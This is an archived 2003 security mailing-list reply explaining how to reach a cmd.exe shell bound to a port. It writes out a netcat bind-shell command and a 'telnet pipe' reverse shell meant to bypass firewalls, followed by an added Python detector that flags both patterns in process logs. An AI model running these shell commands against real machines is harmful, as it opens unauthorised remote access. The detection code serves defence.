Security Basics mailing list archives
Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?
From: DownBload <downbload () hotmail com>
Date: 8 Nov 2003 10:20:41 -0000
In-Reply-To: <20031106153902.26988032.mspencer () evidentdata com>
From: "Mark G. Spencer" <mspencer () evidentdata com>

I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?

The best tool for such things is NetCat. Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have a shell on tcp port 31337. When you want to connect to that host and port, use NetCat again, but now as 'nc.exe remote_host.com 31337' and you have a shell.

In some cases (like with firewalled machines) you can use the "telnet pipe" technique to bypass the firewall. First run two instances of nc.exe on your machine, like this:

    nc.exe -l -v -p 31337
    nc.exe -l -v -p 31338

(each in a separate window)

Now on the remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"

Write commands in the first window on your machine, and the output will be in the second window.

------------------------------------
DownBload / Illegal Instruction Labs
Security Research & Education
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com

"Born under the lucky star magical,
but on this earth generally tragical."

Check our wargame: http://www.ii-labs.org/wargame/
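
From the defender's side, both command lines in the reply above leave a recognisable trace in process-creation logging (for example Windows event 4688 with command-line auditing, or Sysmon event ID 1). The following is an added example, not part of the original post: the event fields `host` and `cmdline`, the rule names and the sample hosts are assumptions made for illustration.

```python
import ntpath
import re

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
# telnet <host> <port> | cmd.exe | telnet <host> <port>
TELNET_PIPE = re.compile(
    r"telnet(?:\.exe)?\s+\S+\s+\d+\s*\|\s*cmd(?:\.exe)?\s*\|"
    r"\s*telnet(?:\.exe)?\s+\S+\s+\d+", re.IGNORECASE)

def netcat_listener_exec(cmdline):
    """Return (port, program) for a netcat listener started with -e, else None."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    # Name match only: a renamed binary needs hash or behaviour-based detection.
    if not toks or ntpath.basename(toks[0]).lower() not in NETCAT_NAMES:
        return None
    listen, port, program = False, None, None
    for i, tok in enumerate(toks):
        if i == 0 or not tok.startswith("-"):
            continue
        flags = tok[1:]
        nxt = toks[i + 1] if i + 1 < len(toks) else None
        listen = listen or "l" in flags.lower()
        # A flag that takes a value comes last in a combined group (-lvp 31337).
        if flags.endswith("p") and nxt and nxt.isdigit():
            port = int(nxt)
        if flags.endswith("e") and nxt:
            program = nxt
    return (port, program) if listen and program else None

def scan(events):
    """Return (host, rule, detail) for each suspicious process-creation event."""
    findings = []
    for ev in events:
        hit = netcat_listener_exec(ev["cmdline"])
        if hit:
            findings.append((ev["host"], "netcat-listen-exec", hit))
        if TELNET_PIPE.search(ev["cmdline"]):
            findings.append((ev["host"], "telnet-pipe-shell", ev["cmdline"]))
    return findings

# Constructed sample events (hosts are made up; command lines follow the post).
SAMPLE = [
    {"host": "ws-01", "cmdline": "nc.exe -l -v -p 31337 -e cmd.exe"},
    {"host": "ws-02", "cmdline": r'"C:\Temp\nc.exe" -lvp 31338 -e cmd.exe'},
    {"host": "ws-03", "cmdline": "nc.exe -l -v -p 31337"},
    {"host": "ws-04", "cmdline": 'cmd.exe /c "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"'},
    {"host": "ws-05", "cmdline": "nc.exe remote_host.com 31337"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The plain listener (ws-03) and the outbound client (ws-05) are deliberately not flagged; only the listener that hands its socket to a program and the telnet-to-cmd.exe pipeline are.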